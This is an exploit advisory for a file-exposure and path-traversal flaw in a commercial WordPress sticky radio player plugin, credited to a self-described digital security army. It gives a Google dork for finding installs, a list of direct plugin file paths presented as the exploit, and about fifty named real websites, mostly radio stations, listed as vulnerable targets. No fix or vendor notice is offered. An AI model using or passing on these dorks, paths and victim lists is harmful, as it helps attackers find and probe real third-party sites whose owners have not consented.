WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x Exploit

1. #########################################################################################
2.  
3. # Exploit Title : WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x File Information Exposure
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 14/01/2019
7. # Vendor Homepage : lambertgroupproductions.com
8. # Software Download Link :
9. codecanyon.net/item/sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player/17162755
10. codecanyon.net/item/sticky-radio-player-full-width-shoutcast-and-icecast-html5-player/16897465
11. # Software Price : 15$ and 19$
12. # Tested On : Windows and Linux
13. # Category : WebApps
14. # Version Information : From 3.0 to 4.9.x
15. # Exploit Risk : High
16. # Google Dorks : inurl:"/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/"
17. # Vulnerability Type : CWE-200 [ Information Exposure ]
18. CWE-538 [ File and Directory Information Exposure ]
19. CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
20.  
21. #########################################################################################
22.  
23. # Impact :
24. ********
25.  
26. * WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x and other versions is prone to an arbitrary file disclosure
27.  
28. vulnerability because it fails to properly sanitize user-supplied input.
29.  
30. * An attacker can exploit this vulnerability to view local files in the context of the web server process,
31.  
32. which may aid in launching further attacks.
33.  
34. * An information exposure is the intentional or unintentional disclosure
35.  
36. of information to an actor that is not explicitly authorized to have access to that information.
37.  
38. * The product stores sensitive information in files or directories that are accessible
39.  
40. to actors outside of the intended control sphere.
41.  
42. * The software uses external input to construct a pathname that is intended to identify a file or
43.  
44. directory that is located underneath a restricted parent directory, but the software does not
45.  
46. properly neutralize special elements within the pathname that can cause the pathname
47.  
48. to resolve to a location that is outside of the restricted directory.
49.  
50. #########################################################################################
51.  
52. # Exploit :
53. ***********************
54.  
55. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
56.  
57. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Categories
58.  
59. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/categories.php
60.  
61. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_player.php
62.  
63. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_playlist_record.php
64.  
65. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php
66.  
67. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players
68.  
69. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Add_New
70.  
71. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Help
72.  
73. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/help.php
74.  
75. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/players.php
76.  
77. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/preview.html
78.  
79. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/playlist.php
80.  
81. /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/settings_form.php
82.  
83. #########################################################################################
84.  
85. # Video Tutorials
86.  
87. Installation - youtube.com/watch?v=AnhaPcIZUjc
88. Manage the Categories and Playlist - youtube.com/watch?v=pZynu26UKbs
89. How to insert the player into your website - youtube.com/watch?v=RY3ikHSdTNg
90.  
91. #########################################################################################
92.  
93. # Example Vulnerable Sites :
94. *************************
95.  
96. [+] frissfm.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
97.  
98. [+] radiopela.mk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
99.  
100. [+] onadesants.cat/wp/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
101.  
102. [+] pensereal.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
103.  
104. [+] ukieradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
105.  
106. [+] giveme5prod.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
107.  
108. [+] radyomedya.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
109.  
110. [+] radioplus.org.uk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
111.  
112. [+] thespyfm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
113.  
114. [+] mensajerofm.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
115.  
116. [+] fmcidadejardim.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
117.  
118. [+] fondationfemidejabat.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
119.  
120. [+] superlivefm.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
121.  
122. [+] unicolegio.com/home/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
123.  
124. [+] radioe.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
125.  
126. [+] radioarcadie.net/cercle/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
127.  
128. [+] santaupdate.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
129.  
130. [+] sahinfm.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
131.  
132. [+] horebradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
133.  
134. [+] radiobanglanet.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
135.  
136. [+] radiosantacruz.com.br/online/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
137.  
138. [+] proyectovidamcym.com.uy/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
139.  
140. [+] radiokontho.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
141.  
142. [+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
143.  
144. [+] misionvidainternacional.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
145.  
146. [+] radio7.co.tz/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
147.  
148. [+] dizzimonline.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
149.  
150. [+] caraotaradio.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
151.  
152. [+] escandalofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
153.  
154. [+] koswradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
155.  
156. [+] radio-busovaca.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
157.  
158. [+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
159.  
160. [+] eldesconcierto.com.ar/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
161.  
162. [+] gunbitas.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
163.  
164. [+] canarinhofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
165.  
166. [+] resguardoicl.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
167.  
168. [+] radiovioladeouro.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
169.  
170. [+] cadenaradialjupiter.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
171.  
172. [+] radyo-anadolu.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
173.  
174. [+] buenaventuraenlinea.com/bradio/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
175.  
176. [+] elfhq.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
177.  
178. [+] radioserbona.rs/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
179.  
180. [+] renewx.gq/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
181.  
182. [+] radiociresarii.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
183.  
184. [+] vibez24.com.ng/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
185.  
186. [+] lol-corsica.fr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
187.  
188. [+] confidencialacesse.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
189.  
190. [+] radioparaisofm.cl/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
191.  
192. [+] lapicosa.com.mx/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
193.  
194. [+] caraotaradio.ml/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
195.  
196. #################################################################################################
197.  
198. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
199.  
200. #################################################################################################